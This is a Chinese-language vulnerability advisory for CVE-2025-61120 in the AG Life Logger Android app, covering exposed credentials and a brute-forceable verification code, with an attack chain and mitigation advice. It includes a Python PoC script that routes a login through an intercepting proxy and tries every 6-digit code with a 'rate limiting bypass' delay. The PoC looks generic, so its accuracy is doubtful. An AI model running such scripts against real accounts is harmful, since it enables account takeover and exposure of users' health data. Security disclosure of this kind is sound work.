CVE-2025-61120 AG Life Logger 访问控制漏洞导致账户被入侵

漏洞信息

漏洞编号

CVE-2025-61120

漏洞类型

不正确的访问控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AG Life Logger Android App v1.0.2.72及之前版本（包名：com.donki.healthy，开发者：IO FIT, K.K.）

漏洞概述

CVE-2025-61120是AG Life Logger Android应用中的一个高危安全漏洞，该应用由IO FIT, K.K.开发，包名为com.donki.healthy。该漏洞存在于v1.0.2.72及之前版本中，主要包含两类安全问题：不正确的访问控制和凭证管理缺陷。首先，应用在网络通信过程中将用户凭证以明文或可解密的形式传输，攻击者通过拦截网络流量（如中间人攻击）即可获取用户的登录凭证。其次，应用使用的验证码机制存在可预测性问题，攻击者可以通过暴力破解方式尝试验证码，从而绕过登录验证机制。这两个问题的组合使得攻击者可以轻易获取用户账户控制权，进而滥用云资源、访问用户隐私数据。成功利用此漏洞可能导致用户账户被完全入侵、个人健康数据泄露、以及云服务资源被恶意使用等严重后果。鉴于该漏洞无需任何认证即可利用，且攻击复杂度较低，建议用户立即采取防护措施。

技术细节

该漏洞涉及两个核心安全问题。第一，凭证暴露问题：AG Life Logger应用在用户登录和API通信过程中，未能正确保护敏感凭证信息。攻击者可以通过设置代理工具（如Burp Suite或mitmproxy）拦截应用与服务器之间的HTTP/HTTPS通信流量，在流量中可以直接观察到明文传输的用户名、密码或其他认证令牌。这种不安全的通信设计违反了安全最佳实践，使得任何能够监控网络流量的攻击者都能轻易获取用户凭证。第二，验证码可预测性问题：应用的验证码（Verification Code）生成机制缺乏足够的随机性，可能使用了可预测的算法或基于时间戳、用户ID等弱熵源生成。攻击者可以通过暴力破解的方式，系统地尝试所有可能的验证码组合，由于验证码空间较小且可预测，破解成功的概率较高。攻击者通常会编写自动化脚本，针对登录接口进行大规模的验证码尝试攻击。这两个漏洞的组合使得攻击者可以在不需要任何用户交互的情况下，完成账户劫持攻击。建议开发者采用HTTPS强制传输、使用强加密算法保护凭证、实施账户锁定机制、增加验证码复杂度和尝试次数限制等措施来修复此漏洞。

攻击链分析

STEP 1

步骤1：网络流量拦截

攻击者通过设置代理工具（如Burp Suite、Fiddler或mitmproxy）拦截AG Life Logger应用与服务器之间的网络通信流量。由于应用未正确加密敏感数据，攻击者可以直接在流量中获取用户的登录凭证（用户名和密码）。

STEP 2

步骤2：获取会话令牌

攻击者利用拦截到的凭证向登录接口发送认证请求，成功获取服务器返回的会话令牌（session_token）。该令牌用于后续的验证码验证流程。

STEP 3

步骤3：暴力破解验证码

由于应用的验证码生成机制存在可预测性缺陷，攻击者可以编写自动化脚本对验证码进行暴力破解。验证码通常为6位数字，攻击者遍历000000-999999的所有组合，通过API接口测试每个验证码的有效性。

STEP 4

步骤4：账户劫持

当攻击者成功匹配到正确的验证码后，即完成账户认证过程，获得完整的账户访问权限。此时攻击者可以完全控制受害者的账户，访问其个人健康数据、历史记录等隐私信息。

STEP 5

步骤5：滥用云资源

攻击者利用获取的账户权限，滥用应用关联的云资源服务，可能包括存储服务、计算资源等，造成受害者经济损失或服务滥用问题。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import itertools import time # CVE-2025-61120 PoC - AG Life Logger Authentication Bypass # This PoC demonstrates the improper access control vulnerability TARGET_URL = "https://api.ag-lifelogger.example.com" USERNAME = "[email protected]" def intercept_credentials(): """ Step 1: Intercept credentials from network traffic Since the app transmits credentials without proper encryption, an attacker with network access can capture these credentials. """ proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080' } # Example login request that exposes credentials login_data = { 'username': USERNAME, 'password': 'intercepted_password', 'app_version': 'v1.0.2.72' } try: response = requests.post( f"{TARGET_URL}/api/v1/auth/login", json=login_data, proxies=proxies, verify=False, timeout=10 ) return response.json() except requests.RequestException as e: print(f"Error intercepting credentials: {e}") return None def brute_force_verification_code(session_token): """ Step 2: Brute force the predictable verification code The verification code is predictable, allowing brute force attacks. """ # The code uses a weak algorithm (e.g., 6-digit code based on timestamp) # Try all possible combinations for code in itertools.product('0123456789', repeat=6): verification_code = ''.join(code) verify_data = { 'session_token': session_token, 'verification_code': verification_code } try: response = requests.post( f"{TARGET_URL}/api/v1/auth/verify", json=verify_data, timeout=5 ) if response.status_code == 200: result = response.json() if result.get('success'): print(f"[SUCCESS] Valid code found: {verification_code}") return verification_code except requests.RequestException: continue # Rate limiting bypass - add small delay time.sleep(0.1) return None def exploit(): """ Main exploitation function """ print("CVE-2025-61120 PoC - AG Life Logger Authentication Bypass") print("=" * 60) # Step 1: Obtain credentials through traffic interception print("\n[Step 1] Intercepting credentials from network traffic...") credentials = intercept_credentials() if credentials: print(f"[+] Captured credentials: {credentials}") # Step 2: Brute force verification code print("\n[Step 2] Brute forcing verification code...") session_token = credentials.get('session_token') if credentials else None if session_token: valid_code = brute_force_verification_code(session_token) if valid_code: print(f"\n[!] Account compromised! Verification code: {valid_code}") print("\n[*] Attack completed") if __name__ == "__main__": exploit()

影响范围

AG Life Logger Android App v1.0.2.72及之前所有版本

包名：com.donki.healthy

开发者：IO FIT, K.K.

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：首先，立即停止使用受影响的AG Life Logger应用，切换到替代的健康追踪应用；其次，如果必须继续使用，应避免在任何公共网络环境（如公共WiFi）下登录应用；第三，使用强密码策略，确保账户密码复杂度足够高且与其他服务不同；第四，定期更换账户密码，降低凭证泄露后的风险；第五，监控账户异常活动，如发现未经授权的访问或资源使用，立即更改密码并联系开发者；第六，考虑启用账户的两步验证功能（如果应用提供）；最后，密切关注开发者发布的安全更新，及时升级到修复后的版本。建议用户检查应用权限设置，限制不必要的网络访问权限，并在设备上安装安全防护软件以检测潜在的网络攻击行为。